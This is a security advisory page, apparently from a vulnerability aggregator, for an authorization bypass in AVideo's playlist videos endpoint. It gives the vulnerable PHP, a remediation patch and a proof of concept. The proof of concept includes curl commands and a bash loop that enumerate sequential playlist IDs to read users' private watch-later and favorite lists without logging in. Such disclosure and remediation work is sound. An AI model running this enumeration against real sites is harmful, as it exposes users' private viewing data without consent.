PHP
CVE-2026-33759
MEDIUM
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The objects/playlistsVideos.json.php endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including watch_later and favorite types) are correctly hidden from listing endpoints via playlistsFromUser.json.php, but their contents are directly accessible through this endpoint by providing the sequential integer playlists_id parameter.
Details
The endpoint at objects/playlistsVideos.json.php accepts a playlists_id parameter and directly calls PlayList::getVideosFromPlaylist() with no ownership or visibility validation:
// objects/playlistsVideos.json.php:24-28
if (empty($_REQUEST['playlists_id'])) {
die('Play List can not be empty');
}
require_once './playlist.php';
$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);The getVideosFromPlaylist() method at objects/playlist.php:588 performs a SQL query joining playlists_has_videos, videos, and users tables with no authorization filter:
// objects/playlist.php:592-597
$sql = "SELECT v.*, p.*,v.created as cre, p.`order` as video_order "
. " FROM playlists_has_videos p "
. " LEFT JOIN videos as v ON videos_id = v.id "
. " LEFT JOIN users u ON u.id = v.users_id "
. " WHERE playlists_id = ? AND v.status != 'i' ";In contrast, the listing endpoint playlistsFromUser.json.php correctly enforces visibility at lines 23-27:
// objects/playlistsFromUser.json.php:23-27
$publicOnly = true;
if (User::isLogged() && (User::getId() == $requestedUserId || User::isAdmin())) {
$publicOnly = false;
}
$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);This creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The .htaccess rewrite at line 356 maps the clean URL playListsVideos.json to this endpoint.
PoC
Step 1: Enumerate playlist contents without authentication
# No cookies or auth headers needed. Increment playlists_id to enumerate.
curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=1" | python3 -m json.toolExpected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.
Step 2: Enumerate private playlists (watch_later, favorite)
# Iterate through sequential IDs to find private playlists
for i in $(seq 1 50); do
result=$(curl -s "http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i")
count=$(echo "$result" | python3 -c "import sys,json; print(len(json.load(sys.stdin)))" 2>/dev/null)
if [ "$count" != "0" ] && [ -n "$count" ]; then
echo "Playlist $i: $count videos"
fi
doneStep 3: Confirm the listing endpoint correctly hides private playlists
# This correctly returns only public playlists for user 1
curl -s "http://TARGET/objects/playlistsFromUser.json.php?users_id=1" | python3 -m json.tool
# Compare: playlistsVideos.json.php returns contents of ALL playlists including private onesImpact
An unauthenticated attacker can:
- Enumerate all users' watch history by accessing
watch_laterplaylist contents - Enumerate all users' favorites by accessing
favoriteplaylist contents - Access unlisted/private custom playlists that were intentionally hidden from public view
- Harvest video metadata including filenames, URLs, user information, and comments for videos in private playlists
This is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.
Recommended Fix
Add authorization checks to objects/playlistsVideos.json.php before returning playlist contents:
// objects/playlistsVideos.json.php - add after line 27, before getVideosFromPlaylist()
require_once $global['systemRootPath'] . 'plugin/PlayLists/PlayLists.php';
$pl = new PlayList($_REQUEST['playlists_id']);
$plStatus = $pl->getStatus();
// Public playlists are accessible to everyone
if ($plStatus !== 'public') {
// Private, unlisted, watch_later, and favorite playlists require ownership or admin
if (!User::isLogged() || (User::getId() != $pl->getUsers_id() && !User::isAdmin())) {
header('HTTP/1.1 403 Forbidden');
die(json_encode(['error' => 'You do not have permission to view this playlist']));
}
}
$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);AnalysisAI
AVideo playlist video enumeration allows unauthenticated attackers to bypass authorization checks and directly access video contents from private playlists including watch_later and favorite lists via the playlistsVideos.json.php endpoint. Sequential playlist IDs enable trivial enumeration of all users' private viewing habits, favorites, and unlisted custom playlists without authentication. A publicly available proof-of-concept exists demonstrating the vulnerability, which affects WWBN AVideo via Composer package wwbn_avideo.
Technical ContextAI
AVideo (wwbn_avideo Composer package) is a PHP-based video platform that implements playlist functionality through two distinct endpoints with divergent security models. The vulnerability exists in the objects/playlistsVideos.json.php endpoint, which accepts a playlists_id parameter and queries the database via PlayList::getVideosFromPlaylist() without verifying playlist ownership or visibility status. The root cause is CWE-639 (Authorization Bypass Through User-Controlled Key), where the application trusts user-supplied playlist IDs without validating that the requesting user has permission to view the playlist contents. In contrast, the playlistsFromUser.json.php listing endpoint correctly enforces visibility filters by checking user authentication and ownership before returning playlist metadata. The vulnerability exploits this inconsistency: private playlists are hidden from enumeration endpoints but fully exposed via direct ID access, compounded by sequential integer IDs that enable trivial brute-force enumeration of the entire playlist namespace.
RemediationAI
Apply the vendor-released patch from commit bb716fbece656c9fe39784f11e4e822b5867f1ca to objects/playlistsVideos.json.php, which adds authorization validation requiring that non-public playlists can only be accessed by the playlist owner or administrators. Pull the latest version from the WWBN AVideo GitHub repository (https://github.com/WWBN/AVideo) after verifying the fix commit has been included in a stable release. As an interim workaround pending patching, restrict network access to the objects/playlistsVideos.json.php endpoint at the web server level (via .htaccess, nginx, or reverse proxy) to authenticated users only, or implement a Web Application Firewall rule to block direct access to playlistsVideos.json.php unless the request originates from a logged-in session. Verify the patch by confirming that the playlistsVideos.json.php endpoint now rejects requests for private playlists from unauthenticated users with a 403 Forbidden response.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today